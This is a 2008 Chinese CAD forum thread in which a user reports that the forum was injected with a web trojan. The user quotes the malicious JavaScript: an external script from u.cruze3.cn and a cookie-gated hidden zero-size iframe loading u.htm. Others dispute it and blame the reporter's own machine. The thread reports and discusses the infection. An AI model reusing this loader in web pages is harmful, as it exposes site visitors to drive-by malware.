QQ登录

只需一步,快速开始

登录 | 注册 | 找回密码

三维网

 找回密码
 注册

QQ登录

只需一步,快速开始

展开

通知     

全站
10天前
查看: 2110|回复: 16
收起左侧

此网被挂马

[复制链接]
发表于 2008-11-26 14:38:57 | 显示全部楼层 |阅读模式 来自: 中国浙江金华

马上注册,结识高手,享用更多资源,轻松玩转三维网社区。

您需要 登录 才可以下载或查看,没有帐号?注册

x
马:Hack.Exploit.Script.JS.Mixed.c
  1. <script language="javascript" SRC="  ' target=_blank>http://u.cruze3.cn/u.js"></script>
    ( Q7 Z' z9 m  a: r8 q, b
  2. 0 ]- }- q$ Y  J
  3. document.writeln("<script>";+ f. V7 U% j% ^  G' e7 D! f- s
  4. document.writeln("function oK_Begin(){";, b, _( C4 [6 c6 v; Y8 q/ f" A
  5. document.writeln("var Then = new Date() ";
    ! ~6 S" o; l4 D9 k8 c
  6. document.writeln("Then.setTime(Then.getTime() + 24*60*60*1000)";+ b. a  M9 F  y* ^7 E, U3 a: Z8 T6 i
  7. document.writeln("var cookieString = new String(document.cookie)";
    . V0 i" _$ L! |8 `9 g- [& b
  8. document.writeln("var cookieHeader = "Cookie1=" ";+ o! g' V& {( M! R
  9. document.writeln("var beginPosition = cookieString.indexOf(cookieHeader)";
    1 \$ y: L$ T0 x5 V+ C+ m. x8 Z
  10. document.writeln("if (beginPosition != -1){ ";& p5 k, E, _% ~4 x: s' ~0 B6 d
  11. document.writeln("} else ";  Q) F2 I7 c) d) V- T# ~/ [
  12. document.writeln("{ document.cookie = "Cookie1=POPWINDOS;expires="+ Then.toGMTString() ";6 V5 j5 d6 t) Z" H2 o0 M2 C* l
  13. document.writeln("document.write(\'<iframe width=0 height=0 src="\'">http://u.cruze3.cn/u.htm"><\/iframe>\');";
    / K- h& T" M1 E" a1 ], @$ z
  14. document.writeln("}";
    # q0 X4 a5 u( _$ k3 C6 E+ h
  15. document.writeln("}";7 D2 a8 x8 h" l
  16. document.writeln("oK_Begin();";
    $ V0 ?1 \+ \& w8 o% q: y  ]
  17. document.writeln("<\/script>";
    - u, r  }% t! A' M0 u& ^
  18. document.writeln("<script>window.onerror=function(){return true;}<\/script>"
      N" y1 x2 @( ~% g8 Y8 M# y. m
  19. 3 W" y# o- |1 x( @1 [
  20. : [1 X( {: e% F0 u9 P* G; P' g8 U
  21. - [  m+ H1 E7 k9 J/ C( D
  22.   W/ I+ S5 S/ V% O  d' y  |
  23. 9 X9 R3 U! G, N2 g
复制代码
虽然从表面上去看是个恶意代码,但里面可能包含马,试图打开此网页u.htm,而此网页可能是网页木马
发表于 2008-11-26 14:44:03 | 显示全部楼层 来自: 中国浙江宁波
请管理员确认是否网页挂马?
发表于 2008-11-26 14:47:52 | 显示全部楼层 来自: 中国江苏南京
我的麦咖啡都没检测出来 你什么杀毒软件?
 楼主| 发表于 2008-11-26 16:16:23 | 显示全部楼层 来自: 中国浙江金华

回复 3# cayuer 的帖子

不是杀软件查的." f  |4 Z) N6 Y6 W% g: `; [# E8 ?! `! k
只是无意中去看了源文件,感觉网头中的u.js很是反常(按常理说,很少在HEAD前,且根目录并是是此网站,于是,下载了u.js,发现不对头.它试图以最小化打开U.HTM网页,按平时的经验,它不是毒就是马,很少有人会在论坛上放毒,一般多是放马.  I; d3 Q/ S2 U+ {- L
不过,已经被清理了.
! [* [; O- w3 t9 B( \& m% z1 U4 A, y6 [% L& v& L" }* s
HEHE
) m2 j" R. E1 @2 t) U5 l& J. Q! l+ T
[ 本帖最后由 czy12 于 2008-11-26 16:25 编辑 ]
发表于 2008-11-26 18:27:17 | 显示全部楼层 来自: 中国浙江温州
你这个什么网站,哪里出来的?
* e+ b0 @5 \9 {; w
! E" D. b$ Z% {$ A- vht tp://u.cruze3.cn/u.js
 楼主| 发表于 2008-11-27 09:15:28 | 显示全部楼层 来自: 中国浙江金华

回复 5# 江南有雪 的帖子

http://u.cruze3.cn/u.js! R0 t- S- X! u7 j
此网是个挂马网,是不可能看到的(他才不会那么笨,HEHE),一般都通过本地IIS进行域名转向./ ]2 n; W! q. [: r
这是昨天我想看别的网页的源文件时,无意中点了此网页的源文件,才发现不对头.
5 z- [3 f8 b: a. U" xHEHE
发表于 2008-11-27 10:26:38 | 显示全部楼层 来自: LAN

回复 6# czy12 的帖子

这跟三维有什么关系?
 楼主| 发表于 2008-11-27 11:01:02 | 显示全部楼层 来自: 中国浙江金华
这是挂在三维网论坛里的.
- @* c. h3 C7 h; J2 t" W9 `3 q红线所指
moma.jpg
发表于 2008-11-27 11:21:19 | 显示全部楼层 来自: 中国上海
奇怪,为什么我的里面没有?是不是楼主的机器自己带病毒了?
发表于 2008-11-27 11:26:10 | 显示全部楼层 来自: 中国甘肃兰州
自己的机子中毒了,就不要满天喊叫了,没人会认为你是一个杀毒的行家
 楼主| 发表于 2008-11-27 11:34:27 | 显示全部楼层 来自: 中国浙江金华
不学无术.1 e( A$ y7 z% f6 X) q+ \
HEHE
mlm.jpg
发表于 2008-11-27 14:30:45 | 显示全部楼层 来自: 中国香港
但在:
* _+ u5 o" C: uhttp://www.3dportal.cn/discuz/ 之原# j/ Y* `5 n9 T" S1 `( A
似乎看不见楼主所说的 http://u.cruze3.cn/u.js
  ~$ A/ E# T- K  Y+ U
" B0 m0 x+ z) v/ s2 g[ 本帖最后由 yyywwwhk 于 2008-11-27 16:23 编辑 ]
发表于 2008-11-27 15:30:58 | 显示全部楼层 来自: 中国山东泰安
经过自编扫描代码处理结果,未发现楼主说的挂马代码!& q- K3 h6 o0 Y- m
" r: w! h) S, q
请清理自己计算机的缓冲区!
1.JPG
头像被屏蔽
发表于 2008-11-27 15:43:48 | 显示全部楼层 来自: 中国河北衡水
提示: 作者被禁止或删除 内容自动屏蔽
发表于 2008-11-27 15:47:42 | 显示全部楼层 来自: 新加坡

回复 8# czy12 的帖子

看您的尾符/script,很像是U盘病毒。
 楼主| 发表于 2008-11-27 15:50:50 | 显示全部楼层 来自: 中国浙江金华
DZ6.1有代码自我修复功能。甚至可以在服务程序中设置定时还原数据库。! H" ~6 Z. X8 S) g1 v6 V$ t$ c
我也说了:已修复。
4 |' E9 U7 n- A: i
2 z% A. B% l$ K! f/ i7 hps:这与缓存毫无关系。虽然缓存中有U.JS.& j0 k- S5 V. z/ b( B
但本机上的毒是不会去改动你的网页内容的.我的机子中毒,和你的网页源代码有何相关?/ T5 T4 l* x3 W" f  m8 [4 Z- ?

! J8 y- C- V% Kscript是个JAVA代码,与U盘何关?* a) X/ E& |7 }. S  C; ?
2 |& {' ?7 y" }$ A5 u) d& j0 R2 S
HEHE
4 n% b! `0 n. X  u
( p) w9 A  b- M) n[ 本帖最后由 czy12 于 2008-11-27 16:03 编辑 ]
发表于 2008-11-27 16:11:40 | 显示全部楼层 来自: 中国山东泰安
非也,代码是程序直接采样的当时的网页代码,是自编的,算不上权威,但是可以直接进入部分加密网站!. K7 r, m8 U. A
8 M6 p5 I# b, T" u1 e2 m
如果却如你说的修改了,我想,这只有论坛管理员有这个权限,即便是后台也是有记录的。假如确实是论坛后台修改了,一定会给大伙一个说法的。8 V, @1 R  e4 C$ S* o* E  l& Q

" D- R3 H( @& g! {: w9 h% p7 x9 v相反,目前从各方面提供的代码显示,确实“此时此刻”是正常的!至于继续讨论已经无大的价值!
发表回复
您需要登录后才可以回帖 登录 | 注册

本版积分规则


Licensed Copyright © 2016-2020 http://www.3dportal.cn/ All Rights Reserved 京 ICP备13008828号

小黑屋|手机版|Archiver|三维网 ( 京ICP备2023026364号-1 )

快速回复 返回顶部 返回列表